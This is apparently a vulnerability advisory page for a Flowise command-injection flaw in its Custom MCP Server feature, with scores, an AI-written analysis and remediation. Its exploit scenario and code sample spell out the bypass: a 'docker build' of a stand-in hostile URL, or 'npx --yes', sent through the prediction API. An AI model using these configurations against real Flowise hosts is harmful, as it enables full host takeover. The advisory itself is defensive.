Flowise CVE-2026-56274

EUVD-2026-38434 · HIGH
OS Command Injection (CWE-78)
2026-06-23 · VulnCheck · GHSA-8rhx-2hcv-q49g
CVSS 4.0: 8.7 (Vendor: VulnCheck)

Severity by source

Vendor (VulnCheck), PRIMARY: 8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

vuln.today (AI): 8.8 HIGH
Network-reachable Flowise UI/API, low complexity, requires any-role account or chatflow-permissioned API key (PR:L), no user interaction, full host RCE gives C/I/A:H.
CVSS 3.1: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS Vector (Vendor: VulnCheck)

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: X

Lifecycle Timeline

Patch available: Jun 23, 2026 - 14:17 (EUVD)
Source Code Evidence Fetched: Jun 23, 2026 - 13:05 (vuln.today)
Analysis Generated: Jun 23, 2026 - 13:05 (vuln.today)
CVE Published: Jun 23, 2026 - 12:13 (cve.org)

Description (CVE.org)

Flowise before 3.1.2 contains multiple OS command injection vulnerabilities in the Custom MCP Server feature due to incomplete command-flag validation and a regex bypass in local file access restrictions. An attacker with a Flowise account of any role, or API access with view/update permissions for chatflows, can configure a malicious MCP server to bypass the validateCommandFlags blocklist (for example, 'docker build' is not blocked, and 'npx --yes' is not blocked while only '-y' is) and the validateArgsForLocalFileAccess checks, resulting in execution of arbitrary commands on the Flowise host.
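The gap described above, reproduced as an added example (this is not Flowise's code): a flag denylist beside a default-deny allowlist, run over constructed MCP server configurations. `DENYLIST`, `ALLOWLIST`, the function names and the package name `@example/approved-mcp-server` are assumptions made for illustration.

```javascript
// Added illustration, not Flowise source. Entries are constructed to mirror the
// two gaps the advisory names: '-y' listed without '--yes', and no 'build' for docker.
const DENYLIST = {
  npx: ['-y'],
  docker: ['run', 'exec'],
};

// Denylist check: anything not explicitly listed passes.
function denylistAllows(command, args) {
  const blocked = DENYLIST[command] || [];
  return !args.some((arg) => blocked.includes(arg));
}

// Default-deny policy (hypothetical): only listed binaries, flags and
// positional values pass. The package name is a placeholder.
const ALLOWLIST = {
  npx: { flags: new Set(), positionals: new Set(['@example/approved-mcp-server']) },
};

function allowlistAllows(command, args) {
  const policy = ALLOWLIST[command];
  if (!policy) return false; // unknown binary, e.g. docker
  return args.every((arg) => {
    if (arg.startsWith('-')) {
      // Compare the flag name only, so '--flag=value' cannot slip past.
      return policy.flags.has(arg.split('=', 1)[0]);
    }
    return policy.positionals.has(arg);
  });
}

// Constructed sample MCP server configurations.
const SAMPLES = [
  { command: 'npx', args: ['@example/approved-mcp-server'] },
  { command: 'npx', args: ['-y', 'unreviewed-package'] },
  { command: 'npx', args: ['--yes', 'unreviewed-package'] },
  { command: 'docker', args: ['build', 'https://untrusted.example/'] },
];

function compare(samples = SAMPLES) {
  return samples.map(({ command, args }) => ({
    config: [command, ...args].join(' '),
    denylist: denylistAllows(command, args),
    allowlist: allowlistAllows(command, args),
  }));
}

console.table(compare());
```

The denylist accepts the long-form flag and the unlisted subcommand, while the allowlist rejects both because neither was ever approved.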

Analysis (AI)

Remote code execution in Flowise before 3.1.2 allows any authenticated user (or API caller with chatflow view/update permissions) to abuse the Custom MCP Server feature and run arbitrary OS commands on the host. The validateCommandFlags blocklist and validateArgsForLocalFileAccess regex are incomplete - for example 'docker build' is permitted and 'npx --yes' is permitted while only '-y' is blocked - letting attackers point Flowise at a hostile Dockerfile or local script to achieve full host compromise. …


Attack Chain (AI, Derived)

Hypothetical attack flow derived from CVE metadata

Access: Obtain Flowise account or API key
Delivery: Create chatflow with Custom MCP Server node
Exploit: Submit docker build or npx --yes payload
Execution: Bypass validateCommandFlags denylist
Persist: Flowise spawns attacker command on host
Impact: Execute Dockerfile RUN or script for host takeover

Vulnerability Assessment (AI)

Exploitation: The target must be Flowise <= 3.1.1 with the Custom MCP Server feature reachable to the attacker, and the attacker must hold either a Flowise account of any role or an API key with view and update permissions on chatflows - fully unauthenticated exploitation is not possible. …

Risk Assessment: The CVSS 4.0 vector AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H (8.7 High) is consistent with the description: exploitation is network-reachable, low-complexity, requires some privilege (an account of any role, or an API key with chatflow view/update), needs no user interaction, and yields full confidentiality/integrity/availability impact on the host. …

Exploit Scenario: An attacker who has signed up for (or been given) a low-privilege Flowise account, or who has obtained an API key with view/update on chatflows, creates a chatflow containing a Custom MCP Server node configured with command 'docker' and args ['build','https://evil.example/']; the validateCommandFlags check passes because 'build' is not in the docker blocklist. The attacker then issues POST /api/v1/prediction/{chatflows_id} which causes Flowise to invoke 'docker build' against the remote URL, pulling and executing a hostile Dockerfile whose RUN instructions and volume-mount tricks break out to the Flowise host. …

Remediation: Vendor-released patch: upgrade flowise and flowise-components to 3.1.2 or later, which extends the validateCommandFlags blocklist and tightens the validateArgsForLocalFileAccess regex (see the GHSA-m99r-2hxc-cp3q advisory). …

Recommended Action (AI)

Within 24 hours: Identify all Flowise deployments and determine current versions; review recent authentication logs and API access for signs of exploitation; isolate any instances exposed to untrusted networks. …
